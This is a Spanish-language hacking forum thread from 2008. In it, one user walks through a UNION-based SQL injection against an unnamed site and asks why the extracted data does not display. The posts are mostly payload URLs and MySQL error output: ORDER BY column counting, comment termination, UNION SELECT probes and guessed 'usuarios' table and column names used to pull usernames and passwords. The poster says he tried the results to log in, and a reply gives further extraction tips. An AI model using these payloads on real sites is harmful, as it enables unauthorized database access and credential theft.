elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  MySQL SQL injection no regresa los datos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: MySQL SQL injection no regresa los datos  (Leído 4,502 veces)
6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
MySQL SQL injection no regresa los datos
« en: 23 Mayo 2008, 22:10 pm »

Bueno he hecho lo siguiente ..

supongamos que tenemos esto.

http://www.site.com/id.php?numero=

bueno enpese haciendo esto ..

http://www.site.com/id.php?numero=-1 order by 1

pero apenas lo hice problemas y tiro el siguiente error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY cuando.IDCUANDO DESC LIMIT 0, 10' at line 1

pero eso se arreglo de la siguiente forma ..

http://www.site.com/id.php?numero=-1 order by 1/*

asi que comente la linea y procedi.


http://www.site.com/id.php?numero=-1 order by 1/*
http://www.site.com/id.php?numero=-1 order by 2/*
http://www.site.com/id.php?numero=-1 order by 3/*
http://www.site.com/id.php?numero=-1 order by 4/*
http://www.site.com/id.php?numero=-1 order by 5/*
hasta que:
http://www.site.com/id.php?numero=-1 order by 6/*
Unknown column '6' in 'order clause'

luego:

http://www.site.com/id.php?numero=-1 union all select 1,2,3,4,5/*

tiro un 2 asi que hice esto.

http://www.site.com/id.php?numero=-1 union all select 1,table_name,3,4,5 from information_schema.tables where table_schema = database()/*

pero obtuve:

SELECT command denied to user 'alguien'@'localhost' for table 'tables'

entonces como no podia y tenia suficientes datos me puse a averiguar las tablas:

http://www.site.com/id.php?numero=-1 union all select 1,concat(username),3,4,5 from users/*

pero me tiro:

Table 'db.users' doesn't exist

asi que probe con otro y puse "usuarios"

http://www.site.com/id.php?numero=-1 union all select 1,concat(username),3,4,5 from usuarios/*

y vaya le pegue! tiro:

Unknown column 'username' in 'field list'

asi que puse otros nombres para reemplazar a "username" hasta que al poner "usuario":

http://www.site.com/id.php?numero=-1 union all select 1,concat(usuario),3,4,5 from usuarios/*

sii! le habia pegado.

pero ...

me tiro la pagina pero no los datos que contenia .. :S.

no habia nada màs que unos : y probe:

http://www.site.com/id.php?numero=-1 union all select 1,concat(pass),3,4,5 from usuarios/*

y tambien le pegue! pero  estaban los 2 puntos .. se que no eran nada pero por las dudas los use para iniciar sesiòn y no tuve resultados.

tambien mire el codigo fuente quizas estaba abajo del flash pero no encontre nada.

por que la pagina no me tira los datos contenidos?



si alguien me puede ayudar estoy aprendiendo  :rolleyes:

« Última modificación: 12 Agosto 2008, 16:28 pm por sirdarckcat » En línea

ChElAnO

Desconectado Desconectado

Mensajes: 129


Ver Perfil
Re: problemas en injection sql
« Respuesta #1 en: 26 Mayo 2008, 18:54 pm »


hola,

si no te muestra el contenido es porque estas poniendolo en una posicion que no es la correcta, es decir:

union all select 1,concat(usuario),3,4,5 from usuarios/*

sabemos que se tiene 5 columnas. Entonces deducimos que algunas son mostradas y otras no. debes probar lo siguiente

union all select concat(usuario),2,3,4,5 from usuarios/*
union all select 1,concat(usuario),3,4,5 from usuarios/*
union all select 1,2,concat(usuario),4,5 from usuarios/*
...
....

hasta que en algun lado lo muestre. No sólo mires la pagina web, mira el codigo fuente en busca de algo distinto. Puedes probar tambien llamando a algun otro dato como @@version, o user()

saludos
En línea

6666

Desconectado Desconectado

Mensajes: 146


Wikileaks.org


Ver Perfil
Re: problemas en injection sql
« Respuesta #2 en: 27 Mayo 2008, 22:24 pm »

he probado en la 1,2,3,4,5 pero nada y es màs cuando hago esto:

-1+union+all+select+1,2,concat(usuario,pass,@@version,user()),4,5+from+usuarios/*

en cualquiera y me larga el user y la version.

hasta probe algo asi:

-1+union+all+select+1,2,concat(usuario,pass,@@version,user()),4,5+from+usuarios+LIMIT 1,1/*

tendria que si ese lugar esta vacio me larga el que viene.

pero sigo sin resultados bueno gracias por la ayuda igual.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sql Injection logs (MySQL)
Nivel Web
Ambr0si0 2 4,199 Último mensaje 6 Abril 2011, 09:52 am
por Ambr0si0
El primer Oddworld regresa por todo lo alto
Noticias
wolfbcn 0 994 Último mensaje 29 Julio 2014, 02:30 am
por wolfbcn
Se fue CrunchBang, pero regresa CrunchBang++
GNU/Linux
Baxtar 0 1,686 Último mensaje 2 Marzo 2015, 09:39 am
por Baxtar
Error Mysql 1222 en sql injection
Hacking
eL_iNdIo 0 2,517 Último mensaje 15 Mayo 2017, 17:31 pm
por eL_iNdIo
Wanna Cry regresa
Seguridad
Nebiros 1 2,181 Último mensaje 18 Mayo 2017, 22:36 pm
por MCKSys Argentina
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines